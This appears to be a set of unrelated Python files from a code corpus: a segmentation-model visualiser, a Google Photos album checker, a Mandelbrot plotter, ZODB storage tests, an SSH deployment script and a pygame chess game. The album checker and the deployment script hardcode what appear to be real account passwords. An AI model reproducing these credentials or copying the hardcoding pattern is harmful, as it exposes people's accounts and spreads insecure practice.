dataloader_val = torch.utils.data.DataLoader(test_dataset,num_workers=nw,pin_memory=pm,\
batch_size=bs)
list_iter = np.arange(len(test_dataset))
np.random.shuffle(list_iter)
# count model
cpt = 0
# First model
model = torch.load('/share/homes/karmimy/equiv/save_model/fully_supervised_lc/31/fcn_fully_sup_lc.pt',map_location=device)
infere_and_save(model,save_dir,list_iter,test_dataset_no_norm,test_dataset,device,cpt)
print('Visu of model',cpt,'Ended')
cpt+=1
model = torch.load('/share/homes/karmimy/equiv/save_model/fully_supervised_lc/30/fcn_fully_sup_lc.pt',map_location=device)
infere_and_save(model,save_dir,list_iter,test_dataset_no_norm,test_dataset,device,cpt)
print('Visu of model',cpt,'Ended')
cpt+=1
model = torch.load('/share/homes/karmimy/equiv/save_model/rot_equiv_lc/17/rot_equiv_lc.pt',map_location=device)
infere_and_save(model,save_dir,list_iter,test_dataset_no_norm,test_dataset,device,cpt)
print('Visu of model',cpt,'Ended')
if __name__ == '__main__':
main()
|
991,117 | 1913095b72a41e491ae6cde2231f466123ca4924 | import gdata.photos.service
import gdata.media
import gdata.geo
import os
email = 'apirakb@gmail.com'
username = 'apirakb'
password = 'Spid#rman'
path = '/Users/apirakb/Pictures/Events'
check = True
# Prepare Google data
gd_client = gdata.photos.service.PhotosService()
gd_client.email = email
gd_client.password = password
gd_client.ProgrammaticLogin()
albums = gd_client.GetUserFeed(user=username)
# Prepare Photo file
os.chdir(path)
directories = os.listdir(os.getcwd())
print 'total directories: %d' % len(directories)
for album in albums.entry:
photo_path = path + "/" + album.title.text
if os.path.isdir(photo_path) == True:
os.chdir(photo_path)
photos = os.listdir(os.getcwd())
local_photos = len(photos) - 1
if album.numphotos.text == str(local_photos):
if not check:
print 'Album name: %s, photos: %s' % (album.title.text,
album.numphotos.text)
else:
print 'Album name: %s, photos: %s, local photos %d' % (album.title.text,
album.numphotos.text, local_photos)
else:
if not check:
print 'Album name: %s, photos: %s < Not local directory' % (album.title.text, album.numphotos.text)
# first_album = albums.entry[20]
# print 'title: %s, number of photos: %s, id: %s' % (first_album.title.text,
# first_album.numphotos.text, first_album.gphoto_id.text)
# photos = gd_client.GetFeed(
# '/data/feed/api/user/%s/albumid/%s?kind=photo' % (
# "apirakb", first_album.gphoto_id.text))
# for photo in photos.entry:
# print 'Photo title:', photo.title.text
# for directory in directories:
# photo_path = path + "/" + directory
# if os.path.isdir(photo_path) == True:
# os.chdir(photo_path)
# photos = os.listdir(os.getcwd())
# print 'Directory name: %s, photos: %d' % (directory, len(photos))
|
991,118 | 55edc1cec37bb820370e566a354a7964dd342c70 | from PIL import Image
#xa, xb = -1.773660804, -1.7736607983
#ya, yb = 0.0063128809733, 0.006312884305
xa, xb = -2, 2
ya, yb = -2, 2
imgx, imgy = 512, 512
maxIt = 256
one = Image.new("RGB", (imgx, imgy))
for y in range(imgy):
cy = y * (yb-ya)/(imgy-1) + ya
for x in range(imgx):
cx = x * (xb-xa)/(imgx-1) + xa
c = complex(cx, cy)
z = 0
for i in range(maxIt):
if abs(z) >= 2.0:
break
z = z**2 + c
if i < 255:
one.putpixel((x,y), ((i*12)%256, i, (i*86)%256))
else:
one.putpixel((x, y), (20, 0, int((y/2)%256))
one.show()
|
991,119 | 160a3ab6a55bebe6aa4cb67679178282eeb77a9f | ##############################################################################
#
# Copyright (c) 2001, 2002 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Run the basic tests for a storage as described in the official storage API
The most complete and most out-of-date description of the interface is:
http://www.zope.org/Documentation/Developer/Models/ZODB/ZODB_Architecture_Storage_Interface_Info.html
All storages should be able to pass these tests.
"""
import transaction
from ZODB import DB, POSException
from ZODB.Connection import TransactionMetaData
from ZODB.tests.MinPO import MinPO
from ZODB.tests.StorageTestBase import zodb_unpickle, zodb_pickle
from ZODB.tests.StorageTestBase import ZERO
from ZODB.tests.util import with_high_concurrency
import threading
import time
import zope.interface
import zope.interface.verify
from random import randint
from .. import utils
class BasicStorage(object):
def checkBasics(self):
self.assertEqual(self._storage.lastTransaction(), ZERO)
t = TransactionMetaData()
self._storage.tpc_begin(t)
self.assertRaises(POSException.StorageTransactionError,
self._storage.tpc_begin, t)
# Aborting is easy
self._storage.tpc_abort(t)
# Test a few expected exceptions when we're doing operations giving a
# different Transaction object than the one we've begun on.
self._storage.tpc_begin(t)
self.assertRaises(
POSException.StorageTransactionError,
self._storage.store,
ZERO, ZERO, b'', '', TransactionMetaData())
self.assertRaises(
POSException.StorageTransactionError,
self._storage.store,
ZERO, 1, b'2', '', TransactionMetaData())
self.assertRaises(
POSException.StorageTransactionError,
self._storage.tpc_vote, TransactionMetaData())
self._storage.tpc_abort(t)
def checkSerialIsNoneForInitialRevision(self):
eq = self.assertEqual
oid = self._storage.new_oid()
txn = TransactionMetaData()
self._storage.tpc_begin(txn)
# Use None for serial. Don't use _dostore() here because that coerces
# serial=None to serial=ZERO.
self._storage.store(oid, None, zodb_pickle(MinPO(11)),
'', txn)
self._storage.tpc_vote(txn)
newrevid = self._storage.tpc_finish(txn)
data, revid = utils.load_current(self._storage, oid)
value = zodb_unpickle(data)
eq(value, MinPO(11))
eq(revid, newrevid)
def checkStore(self):
revid = ZERO
newrevid = self._dostore(revid=None)
# Finish the transaction.
self.assertNotEqual(newrevid, revid)
def checkStoreAndLoad(self):
eq = self.assertEqual
oid = self._storage.new_oid()
self._dostore(oid=oid, data=MinPO(7))
data, revid = utils.load_current(self._storage, oid)
value = zodb_unpickle(data)
eq(value, MinPO(7))
# Now do a bunch of updates to an object
for i in range(13, 22):
revid = self._dostore(oid, revid=revid, data=MinPO(i))
# Now get the latest revision of the object
data, revid = utils.load_current(self._storage, oid)
eq(zodb_unpickle(data), MinPO(21))
def checkConflicts(self):
oid = self._storage.new_oid()
revid1 = self._dostore(oid, data=MinPO(11))
self._dostore(oid, revid=revid1, data=MinPO(12))
self.assertRaises(POSException.ConflictError,
self._dostore,
oid, revid=revid1, data=MinPO(13))
def checkWriteAfterAbort(self):
oid = self._storage.new_oid()
t = TransactionMetaData()
self._storage.tpc_begin(t)
self._storage.store(oid, ZERO, zodb_pickle(MinPO(5)), '', t)
# Now abort this transaction
self._storage.tpc_abort(t)
# Now start all over again
oid = self._storage.new_oid()
self._dostore(oid=oid, data=MinPO(6))
def checkAbortAfterVote(self):
oid1 = self._storage.new_oid()
revid1 = self._dostore(oid=oid1, data=MinPO(-2))
oid = self._storage.new_oid()
t = TransactionMetaData()
self._storage.tpc_begin(t)
self._storage.store(oid, ZERO, zodb_pickle(MinPO(5)), '', t)
# Now abort this transaction
self._storage.tpc_vote(t)
self._storage.tpc_abort(t)
# Now start all over again
oid = self._storage.new_oid()
revid = self._dostore(oid=oid, data=MinPO(6))
for oid, revid in [(oid1, revid1), (oid, revid)]:
data, _revid = utils.load_current(self._storage, oid)
self.assertEqual(revid, _revid)
def checkStoreTwoObjects(self):
noteq = self.assertNotEqual
p31, p32, p51, p52 = map(MinPO, (31, 32, 51, 52))
oid1 = self._storage.new_oid()
oid2 = self._storage.new_oid()
noteq(oid1, oid2)
revid1 = self._dostore(oid1, data=p31)
revid2 = self._dostore(oid2, data=p51)
noteq(revid1, revid2)
revid3 = self._dostore(oid1, revid=revid1, data=p32)
revid4 = self._dostore(oid2, revid=revid2, data=p52)
noteq(revid3, revid4)
def checkGetTid(self):
if not hasattr(self._storage, 'getTid'):
return
eq = self.assertEqual
p41, p42 = map(MinPO, (41, 42))
oid = self._storage.new_oid()
self.assertRaises(KeyError, self._storage.getTid, oid)
# Now store a revision
revid1 = self._dostore(oid, data=p41)
eq(revid1, self._storage.getTid(oid))
# And another one
revid2 = self._dostore(oid, revid=revid1, data=p42)
eq(revid2, self._storage.getTid(oid))
def checkLen(self):
# len(storage) reports the number of objects.
# check it is zero when empty
self.assertEqual(len(self._storage), 0)
# check it is correct when the storage contains two object.
# len may also be zero, for storages that do not keep track
# of this number
self._dostore(data=MinPO(22))
self._dostore(data=MinPO(23))
self.assertTrue(len(self._storage) in [0, 2])
def checkGetSize(self):
self._dostore(data=MinPO(25))
size = self._storage.getSize()
# The storage API doesn't make any claims about what size
# means except that it ought to be printable.
str(size)
def checkNote(self):
oid = self._storage.new_oid()
t = TransactionMetaData()
self._storage.tpc_begin(t)
t.note(u'this is a test')
self._storage.store(oid, ZERO, zodb_pickle(MinPO(5)), '', t)
self._storage.tpc_vote(t)
self._storage.tpc_finish(t)
def checkInterfaces(self):
for iface in zope.interface.providedBy(self._storage):
zope.interface.verify.verifyObject(iface, self._storage)
def checkMultipleEmptyTransactions(self):
# There was a bug in handling empty transactions in mapping
# storage that caused the commit lock not to be released. :(
t = TransactionMetaData()
self._storage.tpc_begin(t)
self._storage.tpc_vote(t)
self._storage.tpc_finish(t)
t = TransactionMetaData()
self._storage.tpc_begin(t) # Hung here before
self._storage.tpc_vote(t)
self._storage.tpc_finish(t)
def _do_store_in_separate_thread(self, oid, revid, voted):
# We'll run the competing trans in a separate thread:
thread = threading.Thread(name='T2',
target=self._dostore, args=(oid,),
kwargs=dict(revid=revid))
thread.daemon = True
thread.start()
thread.join(.1)
return thread
def check_checkCurrentSerialInTransaction(self):
oid = b'\0\0\0\0\0\0\0\xf0'
tid = self._dostore(oid)
tid2 = self._dostore(oid, revid=tid)
data = b'cpersistent\nPersistent\nq\x01.N.' # a simple persistent obj
# ---------------------------------------------------------------------
# stale read
t = TransactionMetaData()
self._storage.tpc_begin(t)
try:
self._storage.store(b'\0\0\0\0\0\0\0\xf1',
b'\0\0\0\0\0\0\0\0', data, '', t)
self._storage.checkCurrentSerialInTransaction(oid, tid, t)
self._storage.tpc_vote(t)
except POSException.ReadConflictError as v:
self.assertEqual(v.oid, oid)
self.assertEqual(v.serials, (tid2, tid))
else:
if 0:
self.assertTrue(False, "No conflict error")
self._storage.tpc_abort(t)
# ---------------------------------------------------------------------
# non-stale read, no stress. :)
t = TransactionMetaData()
self._storage.tpc_begin(t)
self._storage.store(b'\0\0\0\0\0\0\0\xf2',
b'\0\0\0\0\0\0\0\0', data, '', t)
self._storage.checkCurrentSerialInTransaction(oid, tid2, t)
self._storage.tpc_vote(t)
self._storage.tpc_finish(t)
# ---------------------------------------------------------------------
# non-stale read, competition after vote. The competing
# transaction must produce a tid > this transaction's tid
t = TransactionMetaData()
self._storage.tpc_begin(t)
self._storage.store(b'\0\0\0\0\0\0\0\xf3',
b'\0\0\0\0\0\0\0\0', data, '', t)
self._storage.checkCurrentSerialInTransaction(oid, tid2, t)
self._storage.tpc_vote(t)
# We'll run the competing trans in a separate thread:
thread = self._do_store_in_separate_thread(oid, tid2, True)
self._storage.tpc_finish(t)
thread.join(33)
tid3 = utils.load_current(self._storage, oid)[1]
self.assertTrue(tid3 >
utils.load_current(
self._storage, b'\0\0\0\0\0\0\0\xf3')[1])
# ---------------------------------------------------------------------
# non-stale competing trans after checkCurrentSerialInTransaction
t = TransactionMetaData()
self._storage.tpc_begin(t)
self._storage.store(b'\0\0\0\0\0\0\0\xf4',
b'\0\0\0\0\0\0\0\0', data, '', t)
self._storage.checkCurrentSerialInTransaction(oid, tid3, t)
thread = self._do_store_in_separate_thread(oid, tid3, False)
# There are 2 possibilities:
# 1. The store happens before this transaction completes,
# in which case, the vote below fails.
# 2. The store happens after this trans, in which case, the
# tid of the object is greater than this transaction's tid.
try:
self._storage.tpc_vote(t)
except POSException.ReadConflictError:
thread.join() # OK :)
else:
self._storage.tpc_finish(t)
thread.join()
tid4 = utils.load_current(self._storage, oid)[1]
self.assertTrue(
tid4 >
utils.load_current(self._storage, b'\0\0\0\0\0\0\0\xf4')[1])
def check_tid_ordering_w_commit(self):
# It's important that storages always give a consistent
# ordering for revisions, tids. This is most likely to fail
# around commit. Here we'll do some basic tests to check this.
# We'll use threads to arrange for ordering to go wrong and
# verify that a storage gets it right.
# First, some initial data.
t = TransactionMetaData()
self._storage.tpc_begin(t)
self._storage.store(ZERO, ZERO, b'x', '', t)
self._storage.tpc_vote(t)
tids = []
self._storage.tpc_finish(t, lambda tid: tids.append(tid))
# OK, now we'll start a new transaction, take it to finish,
# and then block finish while we do some other operations.
t = TransactionMetaData()
self._storage.tpc_begin(t)
self._storage.store(ZERO, tids[0], b'y', '', t)
self._storage.tpc_vote(t)
to_join = []
def run_in_thread(func):
t = threading.Thread(target=func)
t.daemon = True
t.start()
to_join.append(t)
started = threading.Event()
finish = threading.Event()
@run_in_thread
def commit():
def callback(tid):
started.set()
tids.append(tid)
finish.wait()
self._storage.tpc_finish(t, callback)
results = {}
started.wait()
attempts = []
attempts_cond = utils.Condition()
def update_attempts():
with attempts_cond:
attempts.append(1)
attempts_cond.notify_all()
@run_in_thread
def load():
update_attempts()
results['load'] = utils.load_current(self._storage, ZERO)[1]
results['lastTransaction'] = self._storage.lastTransaction()
expected_attempts = 1
if hasattr(self._storage, 'getTid'):
expected_attempts += 1
@run_in_thread
def getTid():
update_attempts()
results['getTid'] = self._storage.getTid(ZERO)
if hasattr(self._storage, 'lastInvalidations'):
expected_attempts += 1
@run_in_thread
def lastInvalidations():
update_attempts()
invals = self._storage.lastInvalidations(1)
if invals:
results['lastInvalidations'] = invals[0][0]
with attempts_cond:
while len(attempts) < expected_attempts:
attempts_cond.wait()
time.sleep(.01) # for good measure :)
finish.set()
for t in to_join:
t.join(1)
self.assertEqual(results.pop('load'), tids[1])
self.assertEqual(results.pop('lastTransaction'), tids[1])
for m, tid in results.items():
self.assertEqual(tid, tids[1])
# verify storage/Connection for race in between load/open and local
# invalidations.
# https://github.com/zopefoundation/ZEO/issues/166
# https://github.com/zopefoundation/ZODB/issues/290
@with_high_concurrency
def check_race_loadopen_vs_local_invalidate(self):
db = DB(self._storage)
# init initializes the database with two integer objects - obj1/obj2
# that are set to 0.
def init():
transaction.begin()
zconn = db.open()
root = zconn.root()
root['obj1'] = MinPO(0)
root['obj2'] = MinPO(0)
transaction.commit()
zconn.close()
# verify accesses obj1/obj2 and verifies that obj1.value == obj2.value
#
# access to obj1 is organized to always trigger loading from zstor.
# access to obj2 goes through zconn cache and so verifies whether the
# cache is not stale.
failed = threading.Event()
failure = [None]
def verify():
transaction.begin()
zconn = db.open()
root = zconn.root()
obj1 = root['obj1']
obj2 = root['obj2']
# obj1 - reload it from zstor
# obj2 - get it from zconn cache
obj1._p_invalidate()
# both objects must have the same values
v1 = obj1.value
v2 = obj2.value
if v1 != v2:
failure[0] = "verify: obj1.value (%d) != obj2.value (%d)" % (
v1, v2)
failed.set()
# we did not changed anything; also fails with commit:
transaction.abort()
zconn.close()
# modify changes obj1/obj2 by doing `objX.value += 1`.
#
# Since both objects start from 0, the invariant that
# `obj1.value == obj2.value` is always preserved.
def modify():
transaction.begin()
zconn = db.open()
root = zconn.root()
obj1 = root['obj1']
obj2 = root['obj2']
obj1.value += 1
obj2.value += 1
assert obj1.value == obj2.value
transaction.commit()
zconn.close()
# xrun runs f in a loop until either N iterations, or until failed is
# set.
def xrun(f, N):
try:
for i in range(N):
# print('%s.%d' % (f.__name__, i))
f()
if failed.is_set():
break
except: # noqa: E722 do not use bare 'except'
failed.set()
raise
# loop verify and modify concurrently.
init()
N = 500
tverify = threading.Thread(
name='Tverify', target=xrun, args=(verify, N))
tmodify = threading.Thread(
name='Tmodify', target=xrun, args=(modify, N))
tverify.start()
tmodify.start()
tverify.join(60)
tmodify.join(60)
if failed.is_set():
self.fail(failure[0])
# client-server storages like ZEO, NEO and RelStorage allow several storage
# clients to be connected to single storage server.
#
# For client-server storages test subclasses should implement
# _new_storage_client to return new storage client that is connected to the
# same storage server self._storage is connected to.
def _new_storage_client(self):
raise NotImplementedError
# verify storage for race in between load and external invalidations.
# https://github.com/zopefoundation/ZEO/issues/155
#
# This test is similar to check_race_loadopen_vs_local_invalidate but does
# not reuse its code because the probability to reproduce external
# invalidation bug with only 1 mutator + 1 verifier is low.
@with_high_concurrency
def check_race_load_vs_external_invalidate(self):
# dbopen creates new client storage connection and wraps it with DB.
def dbopen():
try:
zstor = self._new_storage_client()
except NotImplementedError:
# the test will be skipped from main thread because dbopen is
# first used in init on the main thread before any other thread
# is spawned.
self.skipTest(
"%s does not implement _new_storage_client" % type(self))
return DB(zstor)
# init initializes the database with two integer objects - obj1/obj2
# that are set to 0.
def init():
db = dbopen()
transaction.begin()
zconn = db.open()
root = zconn.root()
root['obj1'] = MinPO(0)
root['obj2'] = MinPO(0)
transaction.commit()
zconn.close()
db.close()
# we'll run 8 T workers concurrently. As of 20210416, due to race
# conditions in ZEO, it triggers the bug where T sees stale obj2 with
# obj1.value != obj2.value
#
# The probability to reproduce the bug is significantly reduced with
# decreasing n(workers): almost never with nwork=2 and sometimes with
# nwork=4.
nwork = 8
# T is a worker that accesses obj1/obj2 in a loop and verifies
# `obj1.value == obj2.value` invariant.
#
# access to obj1 is organized to always trigger loading from zstor.
# access to obj2 goes through zconn cache and so verifies whether the
# cache is not stale.
#
# Once in a while T tries to modify obj{1,2}.value maintaining the
# invariant as test source of changes for other workers.
failed = threading.Event()
failure = [None] * nwork # [tx] is failure from T(tx)
def T(tx, N):
db = dbopen()
def t_():
transaction.begin()
zconn = db.open()
root = zconn.root()
obj1 = root['obj1']
obj2 = root['obj2']
# obj1 - reload it from zstor
# obj2 - get it from zconn cache
obj1._p_invalidate()
# both objects must have the same values
i1 = obj1.value
i2 = obj2.value
if i1 != i2:
# print('FAIL')
failure[tx] = (
"T%s: obj1.value (%d) != obj2.value (%d)" % (
tx, i1, i2))
failed.set()
# change objects once in a while
if randint(0, 4) == 0:
# print("T%s: modify" % tx)
obj1.value += 1
obj2.value += 1
try:
transaction.commit()
except POSException.ConflictError:
# print('conflict -> ignore')
transaction.abort()
zconn.close()
try:
for i in range(N):
# print('T%s.%d' % (tx, i))
t_()
if failed.is_set():
break
except: # noqa: E722 do not use bare 'except'
failed.set()
raise
finally:
db.close()
# run the workers concurrently.
init()
N = 100
tg = []
for x in range(nwork):
t = threading.Thread(name='T%d' % x, target=T, args=(x, N))
t.start()
tg.append(t)
for t in tg:
t.join(60)
if failed.is_set():
self.fail([_ for _ in failure if _])
|
991,120 | 2f7c3e41f1175793825648b6616e4b8f13d47b94 | #!/usr/bin/python
import paramiko
import multiprocessing
import sys
def cmd(IPS,WAR,USER='wls81',PASSWORD='Paic#234'):
for IP in IPS:
s = paramiko.SSHClient()
s.set_missing_host_key_policy(paramiko.AutoAddPolicy())
s.connect(hostname=IP,username=USER,password=PASSWORD)
s.exec_command('/wls/wls81/deploy.sh war %s' % WAR)
s.close
print '%s OK' %WAR
def consumer(input_q):
while True:
item = input_q.get()
if item is None:
break
cmd(item[1:],item[0])
input_q.task_done()
def producer(sequence,output_q):
for item in sequence:
output_q.put(item)
q = multiprocessing.JoinableQueue()
cons_p1 = multiprocessing.Process(target=consumer,args=(q,))
cons_p1.daemon=True
cons_p1.start()
cons_p2 = multiprocessing.Process(target=consumer,args=(q,))
cons_p2.daemon=True
cons_p2.start()
cons_p3 = multiprocessing.Process(target=consumer,args=(q,))
cons_p3.daemon=True
cons_p3.start()
cons_p4 = multiprocessing.Process(target=consumer,args=(q,))
cons_p4.daemon=True
cons_p4.start()
cons_p5 = multiprocessing.Process(target=consumer,args=(q,))
cons_p5.daemon=True
cons_p5.start()
FILE = sys.argv[1]
sequence = []
for line in open(FILE):
sequence.append(line.split())
producer(sequence,q)
q.join()
|
991,121 | 2f4d4d388e2f819cff99145b327a57d1cf9adc6a | import sys
import os
import pygame
import glob
import random
SIZE = 640
pjas_namn = ("torn", "hast", "lopare", "drottning", "kung", "lopare", "hast", "torn")
vita, svarta = [], []
pjas_dict = {'v':vita, 's':svarta}
player_side = 'v'
bot1_side = 's'
is_legit = lambda x, y : 0<=x<8 and 0<=y<8
def get_rel_pos(pjas_typ):
"Returns tuple of ranges/directions the type can go to."
if not pjas_typ in pjas_namn and pjas_typ[:-2] != "bonde":
raise ValueError("{0} is an invalid type of piece.".format(pjas_typ))
if pjas_typ == "hast":
return (((2,1),) ,((1,2),) ,((-1,2),) ,((-2,1),) ,((-2,-1),) ,((-1,-2),) ,((1,-2),) ,((2,-1),) )
if pjas_typ == "kung":
return (((-1,0),) , ((1,0),) , ((0,-1),) , ((0,1),) , ((-1,-1),) , ((1,1),) , ((1,-1),) , ((-1,1),) )
if pjas_typ == "bonde_v":
return ( ((0,1),), )
if pjas_typ == "bonde_s":
return ( ((0,-1),), )
rak_x1, rak_x2 = tuple((i,0) for i in range(1,8)), tuple((i,0) for i in range(-1,-8,-1))
rak_y1, rak_y2 = tuple((0,i) for i in range(1,8)), tuple((0,i) for i in range(-1,-8,-1))
diag_1, diag2 = tuple((i,i) for i in range(1,8)), tuple((i,i) for i in range(-1,-8,-1))
diag_3, diag_4 = tuple((i,-i) for i in range(1,8)), tuple((i,-i) for i in range(-1,-8,-1))
res = []
if pjas_typ in ("torn", "drottning"):
res.extend((rak_x1, rak_x2, rak_y1, rak_y2))
if pjas_typ in ("lopare", "drottning"):
res.extend((diag_1, diag2, diag_3, diag_4))
return tuple(res)
def is_free(pos, grid, side, vita=vita, svarta=svarta):
"Checks if a box is threatened by any piece"
assert side in ("s", "v"), "Invalid side argument given: '{0}'".format(side)
pjaser = (vita, svarta)[('s', 'v').index(side)]
for pjas in (all_pjas for all_pjas in pjaser if grid[all_pjas.x][all_pjas.y].pjas is all_pjas):
if pos in pjas.goes_to(grid, True):
return False
return True
def safe_move(pjas, pos, grid):
"Checks if a piece can go to/be on a position without being threatened."
grid[pjas.x][pjas.y].pjas = None
res = is_free(pos, grid, pjas.side)
grid[pjas.x][pjas.y].pjas = pjas
return res
def is_valid_state(grid, side):
assert len(pjas_dict[side])>0, "Is_valid_state called from side without pieces."
kung = pjas_dict[side][0].kung
if is_free((kung.x, kung.y), grid, side):
return True
return False
def is_valid_move(start, to, grid, vita=vita, svarta=svarta):
"Checks if a move is valid"
x1, y1 = start
moving = grid[x1][y1].pjas
if not moving:
return False
side = moving.side
old = moving.pos()
killed = moving.move_to(to, grid, only_testing=True)
was_valid = is_free(moving.kung.pos(), grid, moving.side)
moving.move_to(old, grid, only_testing=True)
if killed: #Restore the dead
grid[killed.x][killed.y].pjas = killed
return was_valid
class Pjas:
size = 60
moved = False
kung = None
img = None
def __init__(self, adress, cord, pjas_typ, grid=None, pre_rel=None):
"Inits pjas class. img-adress, cordinates(x,y), type of piece(pjasnamn/bonde_v/s), optional grid to edit grid[pos].pjas"
no_img = False
if adress in ('s','v'):
side = adress
no_img = True
self.side = side
else:
side = os.path.splitext(adress)[0][-1]
self.side = side
assert side in ('s', 'v'), "Adress {0} not pointing to chess piece".format(adress)
self.img = pygame.image.load(adress)
self.x, self.y = cord
self.typ = pjas_typ
#relative postisions
if pre_rel:
self.rel = pre_rel
else:
self.rel = get_rel_pos(pjas_typ)
if pjas_typ == "bonde_v":
self.kill = ((1,1), (-1,1))
self.bonus = (0,2)
if pjas_typ == "bonde_s":
self.kill = ((1,-1), (-1,-1))
self.bonus = (0,-2)
if grid:
grid[self.x][self.y].pjas = self
def pos(self):
return (self.x, self.y)
def blit(self, dis):
"Draws image of itself."
s = SIZE // 8
margin = (s-self.size)//2
x, y = self.x * s + margin, self.y*s+margin
dis.blit(self.img, (x, y))
def goes_to(self, grid, only_killing = False):
"Creates generator to iterate through every square self can go to."
for line in self.rel: #Ordinary, goes through every direction this type of piece can go to.
for rel_pos_x, rel_pos_y in line: #every square in this direction
if only_killing and self.typ in ("bonde_s", "bonde_v"): continue
x, y = self.x + rel_pos_x, self.y + rel_pos_y
if not is_legit(x,y):
break
at = grid[x][y].pjas
if at != None:
if only_killing or (at.side != self.side and self.typ not in ("bonde_v", "bonde_s") ):
if only_killing or at.typ != "kung":
if only_killing or self.typ != "kung":
yield (x,y)
elif safe_move(self, (x,y), grid): #king looking for move, not only_killing
yield (x,y)
break
if self.typ != "kung" or only_killing :
yield (x,y)
elif safe_move(self, (x,y), grid):
yield (x,y)
if self.typ in ("bonde_s", "bonde_v"): #Special case pawn
if not self.moved and not only_killing: #First move go two steps.
x,y = self.x + self.rel[0][0][0], self.y + self.rel[0][0][1]
if not grid[x][y].pjas and not grid[self.x][self.y+self.bonus[1]].pjas:
yield (self.x,self.y+self.bonus[1])
for rel_x, rel_y in self.kill: #Go diagonally if it kills opponent
target_x, target_y = self.x+rel_x, self.y + rel_y
if not is_legit(target_x, target_y):
continue
if grid[target_x][target_y].pjas:
if (grid[target_x][target_y].pjas.side != self.side and grid[target_x][target_y].pjas.typ != "kung") or only_killing:
yield (target_x, target_y)
elif only_killing:
yield (target_x, target_y)
if (self.typ == "kung" )and (not self.moved and not only_killing): #castling
for d in (-1,1):
for i in (1,2):
if not is_free((self.x+i*d,self.y), grid, self.side) or grid[self.x+i*d][self.y].pjas:
break
if i == 2:
rook = grid[(d+1)//2*7][self.y].pjas
if rook:
if not rook.moved:
yield (self.x+i*d, self.y)
def die(self, grid, vita=vita, svarta=svarta):
"Removes itself from grid and piece list when removed."
grid[self.x][self.y].pjas = None
l = (vita, svarta)[('v','s').index(self.side)]
ind = l.index(self)
del l[ind]
def move_to(self, pos, grid, only_testing = False, vita=vita, svarta=svarta):
"Moves piece to pos:(x,y) and edits the grid pjas attributes accordingly."
tox, toy = pos
killing = grid[tox][toy].pjas
if grid[tox][toy].pjas and not only_testing:
grid[tox][toy].pjas.die(grid)
if self.typ == "kung" and abs(pos[0]-self.x)>1 and not only_testing: # castling
self.castling(pos, grid)
grid[self.x][self.y].pjas, grid[pos[0]][pos[1]].pjas = None, grid[self.x][self.y].pjas
self.x, self.y = pos
if not only_testing: self.moved = True
if self.typ in ("bonde_v", "bonde_s") and not only_testing: #make new piece
ind = ('s', 'v').index(self.side)
if self.y == ind*7:
self.transform()
return killing
def castling(self, pos, grid):
d = (pos[0]-self.x)//abs(pos[0]-self.x)
rook = grid[(d+1)//2*7][self.y].pjas
rook_tox, rook_toy = pos[0]-d, self.y
rook.move_to((rook_tox, rook_toy), grid)
def transform(self):
if self.side == player_side:
new_type = input("Du kom med en bonde till sista linjen. Välj vilken pjäs du vill ha: ")
while new_type not in ("hast", "lopare", "torn", "drottning"):
new_type = input("Du måste ange en giltig pjäs. Välj 'hast', 'torn', 'lopare' eller 'drottning'. ")
else:
new_type = bot.chose_piece()
new_adress = glob.glob('*'+new_type+'_'+self.side+'*')[0]
self.__init__(new_adress, (self.x, self.y), new_type)
# def __del__(self):
# if self.img:
# print("{0} piece of {1} side died. ".format(self.typ, self.side))
def copy(self):
"Returns a new copied instance of itself."
res = Pjas(self.side, self.pos(), self.typ, None, self.rel)
res.moved = self.moved
return res
class Ruta:
def __init__(self):
"Inits ruta class. Only attributes pjas and available(indicates if currently moving piece can go here)"
self.pjas = None
self.available = False
class Player:
"Makes moves for the user."
moving = None
def __init__(self, pjaser):
self.pjaser = pjaser
self.side = pjaser[0].side
for pjas in pjaser:
if pjas.typ == 'kung':
self.kung = pjas
break
for pjas in pjaser:
pjas.kung = self.kung
def begin_move(self, pos, grid):
x, y = pos
my_piece = grid[x][y].pjas
if my_piece:
if my_piece.side == self.side: #It's my piece
self.moving = my_piece
for tox, toy in my_piece.goes_to(grid):
if is_valid_move(my_piece.pos(), (tox, toy), grid):
grid[tox][toy].available = True
return True
return None
def make_move(self, pos, grid):
"Perfroms a move."
x,y = pos
if not self.moving:
return None
self.moving.move_to(pos, grid)
self.moving = None
return True
class Random_bot:
"Plays random."
kung = None
def __init__(self, pjaser):
self.pjaser = pjaser
self.side = pjaser[0].side
for pjas in pjaser:
if pjas.typ == "kung":
self.kung = pjas
for pjas in pjaser:
pjas.kung = self.kung
def make_move(self, grid):
"Makes a random valid chess move."
pjaser = self.pjaser
kung = self.kung
op_side = ('s','v')[('s','v').index(self.side)*-1+1]
options = [pjas for pjas in pjaser]
while options:
choice = random.choice(options)
pos_moves = [move for move in choice.goes_to(grid)]
while pos_moves:
move = random.choice(pos_moves)
old = (choice.x, choice.y)
if is_valid_move(choice.pos(), move, grid):
choice.move_to(move, grid)
return 0
pos_moves.remove(move)
options.remove(choice)
if is_free((self.kung.x, self.kung.y), grid, self.side):
return -1
return 1
def chose_piece():
return random.choice(("torn", "hast", "lopare", "drottning"))
def ram(dis, pos, dim, width, color=(90,255,0)):
"Draws empty rectangle. Takes pos:(x,y), dimension_of_rectangle:(length, height) and width_of_border."
x, y, l, h = pos[0], pos[1], dim[0], dim[1]
pygame.draw.rect(dis, color, [x,y,l,width]) #övre
pygame.draw.rect(dis, color, [x,y,width,h]) #vänstra
pygame.draw.rect(dis, color, [x,y+h-width,l,h]) #nedre
pygame.draw.rect(dis, color, [x+l-width,y,width,h]) #högra
def draw_grid(dis, grid):
''' Ritar Brädet '''
white = (255,255,255)
black = (50,50,50)
s = SIZE // 8
for y in range(0,8):
add = 1
if y % 2 == 1:
add = 0
for x in range(0,8):
if (x+add) % 2 == 0: # Vit ruta
pygame.draw.rect(dis, white, [x*s,y*s,s,s])
else: # Svart ruta
pygame.draw.rect(dis, black, [x*s,y*s,s,s])
if grid[x][y].pjas:
grid[x][y].pjas.blit(dis)
if grid[x][y].available:
ram(dis, (x*s,y*s), (s,s), 10)
def main(opp = None):
s = SIZE//8
moving_from = (None, None)
your_move = 0
dis = pygame.display.set_mode((SIZE, SIZE))
clock = pygame.time.Clock()
going = True
